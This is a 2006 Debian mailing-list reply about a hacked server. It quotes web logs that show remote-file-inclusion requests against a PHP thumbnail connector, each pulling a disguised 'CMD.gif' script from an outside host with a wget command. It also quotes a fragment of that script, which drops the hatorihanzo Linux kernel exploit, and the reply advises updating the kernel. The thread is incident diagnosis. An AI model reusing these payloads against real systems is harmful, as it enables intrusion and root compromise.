Re: ***DEB*: Re: help needed
On Mon, Nov 06, 2006 at 06:21:26PM +0100, Fuzzums wrote:
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
> http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 495 "http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
> http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 499 "http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
>
> http://213.202.214.106/CMD.gif isn't a gif.
>
> [snip]
>
> if ($kernel == "write") {
> $kernel = "/*\n" .
> " * hatorihanzo.c\n" .
> " * Linux kernel do_brk vma overflow exploit.\n" .
> " *\n" .
> " * The bug was found by Paul (IhaQueR) Starzetz
> <paul@isec.pl>\n" .
> " *\n" .
> " * Further research and exploit development by\n" .
> " * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
> " *\n" .
> " * (c) 2003 Copyright by IhaQueR and cliph. All Rights
> Reserved.\n" .
> " *\n" .
> " * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION
> AND ANY USE\n" .
> " * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
>
> [/snip]
>
> I think this will give you an idea of what happened.
keep your kernel uptodate, easiest if you use the Debian provided
linux images they have security support.
this hole is closed since long there.
--
maks
Reply to: